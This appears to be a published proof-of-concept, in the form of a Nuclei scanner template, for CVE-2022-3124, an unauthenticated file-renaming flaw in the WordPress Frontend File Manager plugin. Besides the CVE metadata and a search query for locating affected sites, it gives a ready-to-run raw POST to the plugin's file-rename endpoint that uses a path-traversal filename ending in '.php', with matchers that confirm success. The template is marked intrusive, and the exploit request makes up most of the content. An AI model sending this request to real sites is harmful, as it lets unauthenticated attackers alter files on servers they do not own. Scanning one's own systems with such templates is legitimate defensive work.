The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server
PoC代码[已公开]
id: CVE-2022-3124
info:
name: Frontend File Manager < 21.3 - Unauthenticated File Renaming
author: riteshs4hu
severity: medium
description: |
The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3124
- https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-3124
cwe-id: CWE-862
epss-score: 0.39662
epss-percentile: 0.97222
cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: najeebmedia
product: frontend_file_manager
framework: wordpress
publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/"
tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive
variables:
rand_string: '{{to_lower(rand_text_alpha(6))}}'
http:
- raw:
- |
POST /wp-json/wpfm/v1/file-rename HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fileid=1&filename=../../../../{{rand_string}}.php
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"fileid"\s*:\s*"([^"]+)"'
- '"filename"\s*:\s*"([^"]+)"'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502204c759394487dece1413323e0cfa82ae0939815ddf4754d6dfedfc178207ae2f5022100e71be6852d74749d4b84f1afedfbe1bb37ca7af62d82e4ccaa5c953c9bfbbf1d:922c64590222798bb761d5b6d8e72950